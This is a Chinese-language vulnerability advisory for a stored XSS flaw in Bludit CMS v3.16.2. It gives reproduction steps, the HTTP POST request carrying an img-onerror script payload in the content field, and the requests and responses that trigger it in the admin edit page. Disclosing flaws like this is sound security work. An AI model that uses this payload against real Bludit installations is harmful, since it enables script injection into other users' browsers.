Bludit v3.16.2存储型XSS漏洞分析:通过"添加新内容"功能实现攻击

本文详细分析了Bludit CMS v3.16.2中存在的存储型XSS漏洞,攻击者可通过"添加新内容"功能注入恶意脚本,包含完整的漏洞复现步骤和HTTP请求/响应数据。

漏洞标题:Bludit v3.16.2"添加新内容"功能存储型XSS漏洞

日期:2025年7月

漏洞作者:Andrey Stoykov

版本:3.16.2

测试环境:Debian 12

博客:https://msecureltd.blogspot.com/

存储型XSS"添加新内容"功能漏洞#1:

复现步骤:

  1. 使用管理员账户登录并访问"新建内容"
  2. 在"源代码"字段输入以下参数 “
  3. 点击"预览"时XSS载荷将被触发

// 添加新内容的HTTP POST请求

POST /bludit/admin/new-content HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 […]

tokenCSRF=03a860fcc567fed86f6cb57e5877a469ef27e2ac&uuid=b219c568827ee49d5b8be839d6ab1043&type=published&coverImage=&content=<img+src%3d""+onerror%3d"alert(document.domain)">&category=&description=&date=2025-06-04+15%3A15%3A17&typeSelector=published&position=3&tags=&template=&externalCoverImage=&slug=xss&noindex=0&nofollow=0&noarchive=0&title=xss

// HTTP响应

HTTP/1.1 301 Moved Permanently Date: Wed, 04 Jun 2025 19:16:04 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: Bludit Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: /bludit/admin/content Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

// 触发XSS的HTTP GET请求

GET /bludit/admin/edit-content/xss HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 […]

// HTTP响应

HTTP/1.0 200 OK Date: Wed, 04 Jun 2025 19:16:06 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: Bludit Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8

[…]